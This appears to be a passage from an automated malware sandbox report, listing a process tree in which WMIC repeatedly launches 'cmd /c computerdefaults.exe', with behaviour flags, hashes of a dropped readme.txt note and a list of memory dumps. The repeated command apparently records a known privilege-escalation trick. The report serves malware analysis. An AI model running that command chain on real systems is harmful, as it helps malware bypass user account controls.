PID:2672

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:4088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4740

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4332

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4788

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:1420

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4780

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4040

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4772

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4100

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4764

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4380

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4756

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4464

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4748

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:3960

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4732

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4296

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4724

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4448

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4716

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4376

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4708

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4400

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4468

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4692

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4412

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:5108

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt
MD5
8fcf4f32d91ad0a49fcb8e463b997e02

SHA1
0a6e61022f2d73dbcca866777bc768d3da4755c7

SHA256
5e4dd55513e7bf587e48b7b31667b2d95139b0f3b9afb89619e0545456cd5b2a

SHA512
446c150371bc8d4effb1915a60be57725c2f56843cba50233f18f10233e19c66e9df6aa76de8e04386a771e75a3193d4aaffce266d0f3a839758721814e0b790

Download Submit
memory/416-145-0x0000000000000000-mapping.dmp

Download
memory/492-134-0x0000000000000000-mapping.dmp

Download
memory/636-144-0x0000000000000000-mapping.dmp

Download
memory/664-151-0x0000000000000000-mapping.dmp

Download
memory/736-142-0x0000000000000000-mapping.dmp

Download
memory/992-127-0x0000016AFF570000-0x0000016AFF571000-memory.dmp

Filesize
4KB

Download
memory/992-116-0x0000016AFD480000-0x0000016AFD486000-memory.dmp

Filesize
24KB

Download
memory/992-125-0x0000016AFF550000-0x0000016AFF551000-memory.dmp

Filesize
4KB

Download
memory/992-124-0x0000016AFF540000-0x0000016AFF541000-memory.dmp

Filesize
4KB

Download
memory/992-123-0x0000016AFF510000-0x0000016AFF511000-memory.dmp

Filesize
4KB

Download
memory/992-126-0x0000016AFF560000-0x0000016AFF561000-memory.dmp

Filesize
4KB

Download
memory/992-117-0x0000016AFD5D0000-0x0000016AFD5D1000-memory.dmp

Filesize
4KB

Download
memory/992-122-0x0000016AFF500000-0x0000016AFF501000-memory.dmp

Filesize
4KB

Download
memory/992-121-0x0000016AFF4F0000-0x0000016AFF4F1000-memory.dmp

Filesize
4KB

Download
memory/992-155-0x0000016AFFB70000-0x0000016AFFB71000-memory.dmp

Filesize
4KB

Download
memory/992-118-0x0000016AFD5E0000-0x0000016AFD5E1000-memory.dmp

Filesize
4KB

Download
memory/992-120-0x0000016AFD600000-0x0000016AFD601000-memory.dmp

Filesize
4KB

Download
memory/992-119-0x0000016AFD5F0000-0x0000016AFD5F1000-memory.dmp

Filesize
4KB

Download
memory/1144-152-0x0000000000000000-mapping.dmp

Download
memory/1160-146-0x0000000000000000-mapping.dmp

Download
memory/1420-169-0x0000000000000000-mapping.dmp

Download
memory/1792-129-0x0000000000000000-mapping.dmp

Download
memory/2240-141-0x0000000000000000-mapping.dmp

Download
memory/2308-128-0x0000020061640000-0x0000020061644000-memory.dmp

Filesize
16KB

Download
memory/2468-148-0x0000000000000000-mapping.dmp

Download
memory/2472-131-0x0000000000000000-mapping.dmp

Download
memory/2672-132-0x0000000000000000-mapping.dmp

Download
memory/2676-149-0x0000000000000000-mapping.dmp

Download
memory/2768-133-0x0000000000000000-mapping.dmp

Download
memory/3000-137-0x0000000000000000-mapping.dmp

Download
memory/3472-143-0x0000000000000000-mapping.dmp

Download
memory/3528-150-0x0000000000000000-mapping.dmp

Download
memory/3676-140-0x0000000000000000-mapping.dmp

Download
memory/3700-136-0x0000000000000000-mapping.dmp

Download
memory/3808-147-0x0000000000000000-mapping.dmp

Download
memory/3928-153-0x0000000000000000-mapping.dmp

Download
memory/3960-168-0x0000000000000000-mapping.dmp

Download
memory/3988-135-0x0000000000000000-mapping.dmp

Download
memory/4036-138-0x0000000000000000-mapping.dmp

Download
memory/4040-170-0x0000000000000000-mapping.dmp

Download
memory/4088-139-0x0000000000000000-mapping.dmp

Download
memory/4100-172-0x0000000000000000-mapping.dmp

Download
memory/4104-154-0x0000000000000000-mapping.dmp

Download
memory/4244-156-0x0000000000000000-mapping.dmp

Download
memory/4268-157-0x0000000000000000-mapping.dmp

Download
memory/4292-158-0x0000000000000000-mapping.dmp

Download
memory/4296-166-0x0000000000000000-mapping.dmp

Download
memory/4304-159-0x0000000000000000-mapping.dmp

Download
memory/4332-164-0x0000000000000000-mapping.dmp

Download
memory/4376-163-0x0000000000000000-mapping.dmp

Download
memory/4380-165-0x0000000000000000-mapping.dmp

Download
memory/4400-173-0x0000000000000000-mapping.dmp

Download
memory/4412-162-0x0000000000000000-mapping.dmp

Download
memory/4448-167-0x0000000000000000-mapping.dmp

Download
memory/4464-171-0x0000000000000000-mapping.dmp

Download
memory/4468-161-0x0000000000000000-mapping.dmp

Download
memory/5108-160-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads